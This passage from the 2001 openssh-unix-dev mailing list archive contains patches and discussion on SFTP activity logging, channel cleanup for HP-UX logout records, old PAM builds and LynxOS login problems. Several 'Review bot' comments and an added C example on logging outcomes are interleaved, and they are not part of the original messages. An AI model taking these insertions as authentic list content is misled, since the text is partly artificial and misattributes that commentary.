+411,7 @@ { u_int32_t id, pflags; Attrib *a; - char *name; + char *name, sflags[7] = "------"; int handle, fd, flags, mode, status = SSH2_FX_FAILURE; id = get_int(); 
@@ -390,8 +419,10 @@ pflags = get_int(); /* portable flags */ a = get_attrib(); flags = flags_from_portable(pflags); + sflags_from_portable(&sflags[0], pflags); mode = (a->flags & SSH2_FILEXFER_ATTR_PERMISSIONS) ? a->perm : 0666; TRACE("open id %d name %s flags %d mode 0%o", id, name, pflags, mode); + log("(%d/%d/%s) File/Dir opened: %s (%s,%04o)", ppid, cuid, CUNAME, name, sflags, mode); fd = open(name, flags, mode); if (fd < 0) { status = errno_to_portable(errno); @@ -589,6 +620,7 @@ name = get_string(NULL); a = get_attrib(); TRACE("setstat id %d name %s", id, name); + log("(%d/%d/%s) Permissions altered: %s (%04o).", ppid, cuid, CUNAME, name, a->perm & 0777); if (a->flags & SSH2_FILEXFER_ATTR_PERMISSIONS) { ret = chmod(name, a->perm & 0777); if (ret == -1) @@ -623,6 +655,7 @@ TRACE("fsetstat id %d handle %d", id, handle); fd = handle_to_fd(handle); name = handle_to_name(handle); + log("(%d/%d/%s) Permissions altered: %s (%04o).", ppid, cuid, CUNAME, name, a->perm & 0777); if (fd < 0 || name == NULL) { status = SSH2_FX_FAILURE; } else { @@ -790,6 +823,7 @@ id = get_int(); name = get_string(NULL); TRACE("remove id %d name %s", id, name); + log("(%d/%d/%s) File deleted: %s", ppid, cuid, CUNAME, name); ret = unlink(name); status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; send_status(id, status); @@ -810,6 +844,7 @@ mode = (a->flags & SSH2_FILEXFER_ATTR_PERMISSIONS) ? a->perm & 0777 : 0777; TRACE("mkdir id %d name %s mode 0%o", id, name, mode); + log("(%d/%d/%s) Directory created: %s", ppid, cuid, CUNAME, name); ret = mkdir(name, mode); status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; send_status(id, status); @@ -826,6 +861,7 @@ id = get_int(); name = get_string(NULL); TRACE("rmdir id %d name %s", id, name); + log("(%d/%d/%s) Directory deleted: %s", ppid, cuid, CUNAME, name); ret = rmdir(name); status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; send_status(id, status); 
@@ -869,6 +905,7 @@ oldpath = get_string(NULL); newpath = get_string(NULL); TRACE("rename id %d old %s new %s", id, oldpath, newpath); + log("(%d/%d/%s) File/Dir renamed: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); /* fail if 'newpath' exists */ if (stat(newpath, &st) == -1) { ret = rename(oldpath, newpath); @@ -914,6 +951,7 @@ oldpath = get_string(NULL); newpath = get_string(NULL); TRACE("symlink id %d old %s new %s", id, oldpath, newpath); + log("(%d/%d/%s) Symbolic link created: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); /* fail if 'newpath' exists */ if (stat(newpath, &st) == -1) { ret = symlink(oldpath, newpath); @@ -951,6 +989,7 @@ msg_len = GET_32BIT(cp); if (msg_len > 256 * 1024) { error("bad message "); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Bad Message"); exit(11); } if (buffer_len(&iqueue) < msg_len + 4) @@ -1036,10 +1075,27 @@ __progname = get_progname(av[0]); handle_init(); + /* Initialize the username of the user running the process. */ + cuid = getuid(); + if ((upw = getpwuid(cuid)) == NULL) { + cuname = NULL; + } else { + cuname = upw->pw_name; + } + + /* Initialize the parent process ID. */ + ppid = getppid(); + + /* Initialize the logfile, loglevel dependent on DEBUG compile-time setting. */ #ifdef DEBUG_SFTP_SERVER log_init("sftp-server", SYSLOG_LEVEL_DEBUG1, SYSLOG_FACILITY_AUTH, 0); +#else + log_init("sftp-server", SYSLOG_LEVEL_INFO, SYSLOG_FACILITY_AUTH, 0); #endif + /* Log session start. */ + log("(%d/%d/%s) SFTP session started.", ppid, cuid, CUNAME); + in = dup(STDIN_FILENO); out = dup(STDOUT_FILENO); @@ -1073,6 +1129,7 @@ if (select(max+1, rset, wset, NULL, NULL) < 0) { if (errno == EINTR) continue; + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Select Error"); exit(2); } 
@@ -1082,9 +1139,11 @@ len = read(in, buf, sizeof buf); if (len == 0) { debug("read eof"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "EOF"); exit(0); } else if (len < 0) { error("read error"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Read Error"); exit(1); } else { buffer_append(&iqueue, buf, len); @@ -1095,6 +1154,7 @@ len = write(out, buffer_ptr(&oqueue), olen); if (len < 0) { error("write error"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Write Error"); exit(1); } else { buffer_consume(&oqueue, len); From markus.friedl at informatik.uni-erlangen.de Wed Jun 20 23:19:08 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Wed, 20 Jun 2001 15:19:08 +0200 Subject: openssh and port forwarding as root In-Reply-To: <20010620133241.A97346@messi.uku.fi>; from Jarno.Huuskonen@uku.fi on Wed, Jun 20, 2001 at 01:32:41PM +0300 References: <20010620133241.A97346@messi.uku.fi> Message-ID: <20010620151908.A262@folly> i think it was decided that identd is not worth the trouble of trying to achieve this in a portable way. On Wed, Jun 20, 2001 at 01:32:41PM +0300, Jarno Huuskonen wrote: > Openssh sshd opens the socket that forwards users requested port > forwards as root, so the connection seems to come from root. Is it > enough to open the socket as normal user so the connection would appear > to come from that user ? (On Linux this seems to work, but what about > other OS's ?) From Jarno.Huuskonen at uku.fi Wed Jun 20 23:43:15 2001 
From: Jarno.Huuskonen at uku.fi (Jarno Huuskonen) Date: Wed, 20 Jun 2001 16:43:15 +0300 Subject: openssh and port forwarding as root In-Reply-To: <20010620151908.A262@folly>; from markus.friedl@informatik.uni-erlangen.de on Wed, Jun 20, 2001 at 03:19:08PM +0200 References: <20010620133241.A97346@messi.uku.fi> <20010620151908.A262@folly> Message-ID: <20010620164315.A24954@messi.uku.fi> On Wed, Jun 20, Markus Friedl wrote: > i think it was decided that identd is not worth the trouble > of trying to achieve this in a portable way. Probably the only reason for implementing this might be that inside your own org. identd could give some (weak) auditing/log information. Hmm, how portable is the open socket as user -> identd shows user owns the connection ? > On Wed, Jun 20, 2001 at 01:32:41PM +0300, Jarno Huuskonen wrote: > > Openssh sshd opens the socket that forwards users requested port > > forwards as root, so the connection seems to come from root. Is it > > enough to open the socket as normal user so the connection would appear > > to come from that user ? (On Linux this seems to work, but what about > > other OS's ?) -Jarno -- Jarno Huuskonen - System Administrator | Jarno.Huuskonen at uku.fi University of Kuopio - Computer Center | Work: +358 17 162822 PO BOX 1627, 70211 Kuopio, Finland | Mobile: +358 40 5388169 From Markus.Friedl at informatik.uni-erlangen.de Wed Jun 20 23:49:26 2001 
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Wed, 20 Jun 2001 15:49:26 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010620102051.A1595@ws01.aet.tu-cottbus.de>; from Lutz.Jaenicke@aet.TU-Cottbus.DE on Wed, Jun 20, 2001 at 10:20:51AM +0200 References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> Message-ID: <20010620154926.A8991@faui02.informatik.uni-erlangen.de> On Wed, Jun 20, 2001 at 10:20:51AM +0200, Lutz Jaenicke wrote: > I am resending the following message about problems with utmp handling. thanks. your original message was somehow dropped due to problems with the signal-to-noise ratio. you can try this patch (against -current). the patch does a little bit more, but all you need is this: + channel_free_all(); + signal(SIGCHLD, SIG_DFL); while ((pid = waitpid(-1, &status, WNOHANG)) > 0) session_close_by_pid(pid, status); - channel_stop_listening(); in serverloop.c and an implementation for channel_free_all(). (some interfaces in channel.c have been changed since 2.9). Index: channels.c =================================================================== RCS file: /home/markus/cvs/ssh/channels.c,v retrieving revision 1.125 diff -u -r1.125 channels.c --- channels.c 2001/06/07 20:23:04 1.125 +++ channels.c 2001/06/20 13:25:23 @@ -223,11 +223,7 @@ channels = xmalloc(channels_alloc * sizeof(Channel *)); for (i = 0; i < channels_alloc; i++) channels[i] = NULL; - /* - * Kludge: arrange a call to channel_stop_listening if we - * terminate with fatal(). - */ - fatal_add_cleanup((void (*) (void *)) channel_stop_listening, NULL); + fatal_add_cleanup((void (*) (void *)) channel_free_all, NULL); } /* Try to find a free slot where to put the new channel. */ for (found = -1, i = 0; i < channels_alloc; i++) 
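Review bot: the channels.c @@ -223 hunk repoints the fatal_add_cleanup() registration from channel_stop_listening() to channel_free_all(), which changes what the fatal() path does: the old cleanup closed only listeners and the agent socket, the new one frees every channel, open sessions included, and the removed comment ("auth_sock_cleanup_proc deletes the socket") was the only place documenting who unlinks the unix-domain socket path. Please confirm that channel_free() on an SSH_CHANNEL_AUTH_SOCKET channel still removes the socket file, or note where that now happens; otherwise every fatal() leaves a stale agent socket behind.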
@@ -334,38 +330,15 @@ xfree(c); } - -/* - * Stops listening for channels, and removes any unix domain sockets that we - * might have. - */ - void -channel_stop_listening() +channel_free_all(void) { int i; - Channel *c; - for (i = 0; i < channels_alloc; i++) { - c = channels[i]; - if (c != NULL) { - switch (c->type) { - case SSH_CHANNEL_AUTH_SOCKET: - close(c->sock); - /* auth_sock_cleanup_proc deletes the socket */ - channel_free(c); - break; - case SSH_CHANNEL_PORT_LISTENER: - case SSH_CHANNEL_RPORT_LISTENER: - case SSH_CHANNEL_X11_LISTENER: - close(c->sock); - channel_free(c); - break; - default: - break; - } - } - } + debug("closing all channels"); + for (i = 0; i < channels_alloc; i++) + if (channels[i] != NULL) + channel_free(channels[i]); } /* Index: channels.h =================================================================== RCS file: /home/markus/cvs/ssh/channels.h,v retrieving revision 1.38 diff -u -r1.38 channels.h --- channels.h 2001/06/16 08:50:39 1.38 +++ channels.h 2001/06/20 13:25:24 @@ -150,6 +150,7 @@ channel_set_fds(int id, int rfd, int wfd, int efd, int extusage, int nonblock); void channel_free(Channel *c); +void channel_free_all(void); void channel_send_open(int id); void channel_request(int id, char *service, int wantconfirm); @@ -182,8 +183,8 @@ void channel_output_poll(void); int channel_not_very_much_buffered_data(void); -void channel_stop_listening(void); void channel_close_all(void); +void channel_free_all(void); int channel_still_open(void); char *channel_open_message(void); int channel_find_open(void); Index: clientloop.c =================================================================== RCS file: /home/markus/cvs/ssh/clientloop.c,v retrieving revision 1.75 diff -u -r1.75 clientloop.c --- clientloop.c 2001/06/04 23:07:20 1.75 +++ clientloop.c 2001/06/20 13:28:17 
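Review bot: channels.h gains `void channel_free_all(void);` twice, once in the @@ -150 hunk right after channel_free() and again in the @@ -182 hunk where it replaces channel_stop_listening(). Identical redeclarations compile in C, but keep only one; the second, next to channel_close_all(), keeps the bulk-cleanup functions together.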
@@ -546,7 +546,7 @@ leave_raw_mode(); /* Stop listening for new connections. */ - channel_stop_listening(); + channel_close_all(); /* proto1 only XXXX */ printf("%c& [backgrounded]\n", escape_char); @@ -926,8 +926,7 @@ if (have_pty) signal(SIGWINCH, SIG_DFL); - /* Stop listening for connections. */ - channel_stop_listening(); + channel_free_all(); if (have_pty) leave_raw_mode(); Index: packet.c =================================================================== RCS file: /home/markus/cvs/ssh/packet.c,v retrieving revision 1.66 diff -u -r1.66 packet.c --- packet.c 2001/06/12 16:11:26 1.66 +++ packet.c 2001/06/20 13:25:24 @@ -1085,7 +1085,7 @@ packet_write_wait(); /* Stop listening for connections. */ - channel_stop_listening(); + channel_close_all(); /* Close the connection. */ packet_close(); Index: serverloop.c =================================================================== RCS file: /home/markus/cvs/ssh/serverloop.c,v retrieving revision 1.68 diff -u -r1.68 serverloop.c --- serverloop.c 2001/06/04 23:07:20 1.68 +++ serverloop.c 2001/06/20 13:25:24 @@ -608,8 +608,7 @@ close(fdin); fdin = -1; - /* Stop listening for channels; this removes unix domain sockets. */ - channel_stop_listening(); + channel_free_all(); /* We no longer want our SIGCHLD handler to be called. */ signal(SIGCHLD, SIG_DFL); @@ -700,10 +699,11 @@ if (writeset) xfree(writeset); + channel_free_all(); + signal(SIGCHLD, SIG_DFL); while ((pid = waitpid(-1, &status, WNOHANG)) > 0) session_close_by_pid(pid, status); - channel_stop_listening(); } void From bds at jhb.ucs.co.za Thu Jun 21 00:05:51 2001 
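Review bot: in the serverloop.c @@ -700 hunk `channel_free_all();` now runs immediately before `signal(SIGCHLD, SIG_DFL);` and the `while ((pid = waitpid(-1, &status, WNOHANG)) > 0)` loop. Freeing the session channels signals the child and defers session cleanup until its exit is reaped (Lutz's sshd -d trace in this thread shows `session_close_by_channel: channel 0 kill ...` with no following session_close), and a non-blocking waitpid issued right after the kill can return 0 before the child has died, so session_close_by_pid() never runs for it and record_logout() is skipped. Wait without WNOHANG for the children just signalled, or close sessions whose pid is still set directly, so the logout record is written before sshd exits.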
From: bds at jhb.ucs.co.za (Berend De Schouwer) Date: 20 Jun 2001 16:05:51 +0200 Subject: Old pam systems Message-ID: <993045951.26467.1.camel@bds.ucs.co.za> Hi, I've recently had the pleasure of compiling OpenSSH for an older Linux 2.0/libc 5 machine. It comes with an older version of PAM, and the configure script rightfully triggers HAVE_OLD_PAM. I've found that some PAM_*_CRED #defines have changed, and this prevents auth-pam.c from compiling, so I made the obvious fix. The attached patch is against OpenSSH 2.9p2. Things to consider: - Is this generic? Do all old PAM installations behave the same way? - Is it better to patch defines.h? Or another place? - Is it better to #ifndef AUTH_*_CRED then #define AUTH_CRED_*? Kind regards, Berend -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Berend De Schouwer, +27-11-712-1435, UCS -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: openssh-old-pam.patch Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010620/101bf3ae/attachment.ksh From Lutz.Jaenicke at aet.TU-Cottbus.DE Thu Jun 21 02:08:45 2001 
From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke) Date: Wed, 20 Jun 2001 18:08:45 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010620154926.A8991@faui02.informatik.uni-erlangen.de>; from Markus.Friedl@informatik.uni-erlangen.de on Wed, Jun 20, 2001 at 03:49:26PM +0200 References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> <20010620154926.A8991@faui02.informatik.uni-erlangen.de> Message-ID: <20010620180845.A18250@ws01.aet.tu-cottbus.de> On Wed, Jun 20, 2001 at 03:49:26PM +0200, Markus Friedl wrote: > you can try this patch (against -current). > > the patch does a little bit more, but all you > need is this: > + channel_free_all(); > + > signal(SIGCHLD, SIG_DFL); > while ((pid = waitpid(-1, &status, WNOHANG)) > 0) > session_close_by_pid(pid, status); > - channel_stop_listening(); > > in serverloop.c and an implementation for channel_free_all(). It does not work. The effect is still the same. A sshd -d yields: Connection closed by remote host. debug1: closing all channels debug1: channel_free: channel 0: server-session, nchannels 1 debug1: channel_free: channel 0: dettaching channel user debug1: session_by_channel: session 0 channel 0 debug1: session_close_by_channel: channel 0 kill 18299 Closing connection to 141.43.132.151 Following the code in session.c, session_close_by_channel with s->pid != 0 will "notify child, delay session cleanup". However, session_close() is never called (it would be seen due to debug("session_close: session %d pid %d", s->self, s->pid)) and therefore it seems that session_pty_cleanup(s) (finally calling the record_logout() function) is never called. Best regards, Lutz -- Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 From rjmooney at aboveground.cx Thu Jun 21 06:05:52 2001 
From: rjmooney at aboveground.cx (Robert Mooney) Date: Wed, 20 Jun 2001 16:05:52 -0400 Subject: SFTP Logging Redux. In-Reply-To: <20010620091208.A18950@dour.org> Message-ID: It looks like you're logging the requested action, not the result. For instance: log("(%d/%d/%s) File/Dir opened: %s (%s,%04o)"...); fd = open(name, flags, mode); Unless I'm missing something about the functionality of log(), I would expect it to come after the open(), and include information as to whether or not the action actually succeeded. Also, a switch to a) turn on logging, and b) set the verbosity of the logging would be cool. In general, I think it's easier for a developer to turn his back on your patch if it's adding functionality without requiring the user request it explicitly. Nice idea though, I would like to see something similar committed. - Rob : -----Original Message----- : From: owner-openssh-unix-dev at mindrot.org : [mailto:owner-openssh-unix-dev at mindrot.org]On Behalf Of Jason A . Dour : Sent: Wednesday, June 20, 2001 9:12 AM : To: openssh-unix-dev at mindrot.org : Subject: SFTP Logging Redux. : : : Sorry to repost, but I finally have the code on a machine that has : diff -u, and I've updated it for 2.9p2. Attached is the unified : diff to add logging of SFTP activity to auth.info. : : If there is a more proper way to contrib patches, please let me : know. : : : Cheers, : Jason : # "Jason A. Dour" http://dour.org/ : # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ : From mouring at etoh.eviladmin.org Thu Jun 21 06:12:06 2001 
From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Wed, 20 Jun 2001 15:12:06 -0500 (CDT) Subject: SFTP Logging Redux. In-Reply-To: Message-ID: Agreed. If we are going to log anything it should be the success/failure of the request.. not so much the request itself. - Ben On Wed, 20 Jun 2001, Robert Mooney wrote: > > It looks like you're logging the requested action, not the result. For > instance: > > log("(%d/%d/%s) File/Dir opened: %s (%s,%04o)"...); > fd = open(name, flags, mode); > > Unless I'm missing something about the functionality of log(), I would > expect it to come after the open(), and include information as to > whether or not the action actually succeeded. > > Also, a switch to a) turn on logging, and b) set the verbosity of the > logging would be cool. > > In general, I think it's easier for a developer to turn his back on > your patch if it's adding functionality without requiring the user > request it explicitly. > > Nice idea though, I would like to see something similar committed. > > - Rob > > : -----Original Message----- > : From: owner-openssh-unix-dev at mindrot.org > : [mailto:owner-openssh-unix-dev at mindrot.org]On Behalf Of Jason A . Dour > : Sent: Wednesday, June 20, 2001 9:12 AM > : To: openssh-unix-dev at mindrot.org > : Subject: SFTP Logging Redux. > : > : > : Sorry to repost, but I finally have the code on a machine that has > : diff -u, and I've updated it for 2.9p2. Attached is the unified > : diff to add logging of SFTP activity to auth.info. > : > : If there is a more proper way to contrib patches, please let me > : know. > : > : > : Cheers, > : Jason > : # "Jason A. Dour" http://dour.org/ > : # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ > : > From dveeravalli at telica.com Thu Jun 21 06:39:33 2001 
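The point Rob and Ben make above (record the outcome of the request, not the request) in working code. This is an added illustration, not Jason's patch and not OpenSSH code: `format_audit`, `open_logged` and `struct audit_line` are hypothetical names, and the `(ppid/uid/user)` prefix merely mirrors the patch's format. It also covers the two failure modes a reviewer of the patch would check for: a failed open() is logged as a failure with its errno text rather than as "opened", and a NULL user name (getpwuid() can fail) never reaches a `%s`.

```c
/*
 * Added example (not from the OpenSSH patch under discussion): log the
 * outcome of an SFTP request after the system call has returned, so a
 * failure is recorded as a failure and a NULL user name is never passed
 * to "%s".  All names below are hypothetical.
 */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* One audit record: the text a logging sftp-server would hand to log(). */
struct audit_line {
    char text[256];
    int ok;             /* 1 if the operation succeeded, 0 otherwise */
};

/*
 * Format "(ppid/uid/user) <op>: <name> -> ok" on success, or
 * "(ppid/uid/user) <op>: <name> -> failed: <strerror(err)>" when ret < 0.
 * 'user' may be NULL (getpwuid() can fail); it is printed as "?" then.
 */
void format_audit(struct audit_line *out, int ppid, int uid, const char *user,
                  const char *op, const char *name, int ret, int err)
{
    const char *who = user ? user : "?";
    const char *what = name ? name : "(null)";

    out->ok = (ret >= 0);
    if (out->ok)
        snprintf(out->text, sizeof out->text, "(%d/%d/%s) %s: %s -> ok",
                 ppid, uid, who, op, what);
    else
        snprintf(out->text, sizeof out->text, "(%d/%d/%s) %s: %s -> failed: %s",
                 ppid, uid, who, op, what, strerror(err));
}

/*
 * Open 'path' the way sftp-server's open handler does, but build the audit
 * line afterwards from the result.  Returns the fd (or -1) and leaves the
 * line that would be logged in *al.  errno is saved straight after open(),
 * before any other call can overwrite it.
 */
int open_logged(const char *path, int flags, mode_t mode, struct audit_line *al)
{
    int fd = open(path, flags, mode);
    int saved = errno;

    /* User name deliberately NULL here to exercise the fallback path. */
    format_audit(al, (int)getppid(), (int)getuid(), NULL, "open", path, fd, saved);
    /* In sftp-server this would be: log("%s", al->text); */
    return fd;
}

int main(void)
{
    struct audit_line al;
    int fd = open_logged("/nonexistent/dir/file", O_RDONLY, 0666, &al);

    puts(al.text);          /* "... open: /nonexistent/dir/file -> failed: ..." */
    if (fd >= 0)
        close(fd);
    return 0;
}
```

The same shape applies to the setstat, remove, mkdir and rename handlers in the patch: perform the call, capture errno, then log once with the outcome, instead of logging the intent before the call.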
From: dveeravalli at telica.com (Deepa Nemmili Veeravalli) Date: Wed, 20 Jun 2001 16:39:33 -0400 Subject: FW: FW: behaviour of sshd in debug mode Message-ID: <7AC90049E901D511A8CA009027289AEA8EBDD6@wench> Whoever can help me... please find attached the logs for the openssh sessions from local (host=keg; redhat linux) to remote (host=ben; lynxos). The issue is when I run sshd in debug mode and try to logon from local, password authentication succeeds, but if I run sshd as a daemon, it fails. sshlocal.txt >>> logging at local when sshd is not run with debug option sshlocal...txt >> logging at local when sshd is run with -d -d -d option on remote sshremote..txt >> logging at remote when sshd is run with debug on Thanks for any help! -----Original Message----- From: mouring at etoh.eviladmin.org [mailto:mouring at etoh.eviladmin.org] Sent: Wednesday, June 20, 2001 2:08 PM To: Deepa Nemmili Veeravalli Subject: RE: FW: behaviour of sshd in debug mode Offhand I'm unsure. Login issues tend to stem from the following issues: 1) Incomplete PAM support 2) DES vs MD5 encryption of passwords 3) Unknown verification method. I'm leaning towards #3 right now. Since I don't have a LynxOS box to test I cannot provide too much more direct help. A copy of 'sshd -d -d -d' run may help (To the OpenSSH list please so Markus can also see and give advice), but I'm not too sure at this point. - Ben On Wed, 20 Jun 2001, Deepa Nemmili Veeravalli wrote: > Lynx uses DES ... > > -----Original Message----- 
> From: mouring at etoh.eviladmin.org [mailto:mouring at etoh.eviladmin.org] > Sent: Wednesday, June 20, 2001 11:33 AM > To: Deepa Nemmili Veeravalli > Subject: RE: FW: behaviour of sshd in debug mode > > > > I know very little about LynxOS. Does it use MD5 or DES password > encryption? > > - Ben > > On Wed, 20 Jun 2001, Deepa Nemmili Veeravalli wrote: > > > Remote host is a LynxOS Power-PC machine and Local is RedHat Linux. I had > > ported the openssh-2.9p1 to LynxOs and installed in the same and used > > openssh coming by default with linux on local. > > > > And I did a ./configure powerpc-unknown-lynxos > > > > Do let me know if more info is needed .. > > Thanks, Deepa. > > > > -----Original Message----- > > From: mouring at etoh.eviladmin.org [mailto:mouring at etoh.eviladmin.org] > > Sent: Wednesday, June 20, 2001 11:01 AM > > To: Deepa Nemmili Veeravalli > > Subject: Re: FW: behaviour of sshd in debug mode > > > > > > > > Just like in your original email you did not state what OS the server > > was running nor your ./configure line.. therefore I can't help. I can > > only assume you're on Slackware Linux and you did not read the > > http://www.openbsd.com/faq.html or you are on Redhat and you forgot to > > put in the /etc/pam.d/sshd after you compiled in PAM support. > > > > - Ben > > > > On Wed, 20 Jun 2001, Deepa Nemmili Veeravalli wrote: > > > > > Hi Mouring, > > > Could you help me with a clue to this issue? > > > Thanks, Deepa > > > > > > > > > > -----Original Message----- 
> > > > From: Deepa Nemmili Veeravalli > > > > Sent: Tuesday, June 19, 2001 8:22 PM > > > > To: openssh-unix-dev at mindrot.org > > > > Subject: behaviour of sshd in debug mode > > > > > > > > Hi, > > > > I tried searching openssh docs and the archives but could not get > much > > > > info on this problem I am facing with openssh. > > > > > > > > When I run the sshd on the remote machine (OpenSSH_2.9p1) in debug mode > > and > > > > try to login from local host (OpenSSH_2.3.0), I get into the remote > host > > > > with public key authentication. But if I run sshd without debug mode, I > > am > > > > prompted for password authentication and even though I give the correct > > > > password I am refused connection. > > > > > > > > Please can someone tell me if I am missing something... > > > > > > > > Thanks for any help, > > > > Deepa. > > > > > > > > > > > > > > > > > > -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: sshlocal.txt Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010620/f0774038/attachment.txt -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: sshlocalwithsshRemoteInDebug.txt Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010620/f0774038/attachment-0001.txt -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: sshremoteindebug.txt Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010620/f0774038/attachment-0002.txt From markus.friedl at informatik.uni-erlangen.de Thu Jun 21 13:43:26 2001 
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Thu, 21 Jun 2001 05:43:26 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010620180845.A18250@ws01.aet.tu-cottbus.de>; from Lutz.Jaenicke@aet.TU-Cottbus.DE on Wed, Jun 20, 2001 at 06:08:45PM +0200 References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> <20010620154926.A8991@faui02.informatik.uni-erlangen.de> <20010620180845.A18250@ws01.aet.tu-cottbus.de> Message-ID: <20010621054326.A17059@folly> On Wed, Jun 20, 2001 at 06:08:45PM +0200, Lutz Jaenicke wrote: > On Wed, Jun 20, 2001 at 03:49:26PM +0200, Markus Friedl wrote: > > you can try this patch (against -current). > > > > the patch does a little bit more, but all you > > need is this: > > + channel_free_all(); > > + > > signal(SIGCHLD, SIG_DFL); > > while ((pid = waitpid(-1, &status, WNOHANG)) > 0) > > session_close_by_pid(pid, status); > > - channel_stop_listening(); > > > > in serverloop.c and an implementation for channel_free_all(). > > It does not work. > > The effect is still the same. > A sshd -d yields: > Connection closed by remote host. > debug1: closing all channels > debug1: channel_free: channel 0: server-session, nchannels 1 > debug1: channel_free: channel 0: dettaching channel user > debug1: session_by_channel: session 0 channel 0 > debug1: session_close_by_channel: channel 0 kill 18299 > Closing connection to 141.43.132.151 > > Following the code in session.c, session_close_by_channel with > s->pid != 0 will "notify child, delay session cleanup". > However, session_close() is never called (it would be seen due to > debug("session_close: session %d pid %d", s->self, s->pid)) > and therefore it seems that session_pty_cleanup(s) (finally calling > the record_logout() function) is never called. i see, there are more changes in current. could you please try current? From Lutz.Jaenicke at aet.TU-Cottbus.DE Thu Jun 21 18:26:00 2001 
From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke) Date: Thu, 21 Jun 2001 10:26:00 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010621054326.A17059@folly>; from markus.friedl@informatik.uni-erlangen.de on Thu, Jun 21, 2001 at 05:43:26AM +0200 References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> <20010620154926.A8991@faui02.informatik.uni-erlangen.de> <20010620180845.A18250@ws01.aet.tu-cottbus.de> <20010621054326.A17059@folly> Message-ID: <20010621102600.B20678@ws01.aet.tu-cottbus.de> On Thu, Jun 21, 2001 at 05:43:26AM +0200, Markus Friedl wrote: > On Wed, Jun 20, 2001 at 06:08:45PM +0200, Lutz Jaenicke wrote: > > Following the code in session.c, session_close_by_channel with > > s->pid != 0 will "notify child, delay session cleanup". > > However, session_close() is never called (it would be seen due to > > debug("session_close: session %d pid %d", s->self, s->pid)) > > and therefore it seems that session_pty_cleanup(s) (finally calling > > the record_logout() function) is never called. > > i see, there are more changes in current. > > could you please try current? ??? I have applied the patch to the latest version I got from CVS (:pserver:cvs at bass.directhit.com:/cvs ...), the latest ChangeLog being: 20010615 - (stevesk) don't set SA_RESTART and set SIGCHLD to SIG_DFL around grantpt(). - (stevesk) update TODO: STREAMS pty systems don't call vhangup() now 20010614 Is there another source I should try? Best regards, Lutz -- Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 From jason at dour.org Thu Jun 21 22:17:00 2001 
From: jason at dour.org (Jason A . Dour) Date: Thu, 21 Jun 2001 08:17:00 -0400 Subject: SFTP Logging Redux. In-Reply-To: ; from rjmooney@aboveground.cx on Wed, Jun 20, 2001 at 04:05:52PM -0400 References: <20010620091208.A18950@dour.org> Message-ID: <20010621081700.A21713@dour.org> On Wed, Jun 20, 2001 at 04:05:52PM -0400, Robert Mooney wrote: > It looks like you're logging the requested action, not the result. For > instance: True. I was mainly worried about logging in general on my first pass through the code. So I simply logged anywhere there was a TRACE. Not the greatest...but it met my extremely short time-frame. > Unless I'm missing something about the functionality of log(), I would > expect it to come after the open(), and include information as to > whether or not the action actually succeeded. True. I'm working on a patch today for this functionality. > Also, a switch to a) turn on logging, and b) set the verbosity of the > logging would be cool. Compile-time or execution time? Ideally execution-time, in my opinion, but that complicates the coding. Compile time reduces complexity and makes it feasible to be there in the next patch. > In general, I think it's easier for a developer to turn his back on > your patch if it's adding functionality without requiring the user > request it explicitly. Noted. Thanks! I'll post the fix as soon as I have it. Cheers, Jason # "Jason A. Dour" http://dour.org/ # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ From tuneki at pb.jp.nec.com Thu Jun 21 22:59:02 2001 
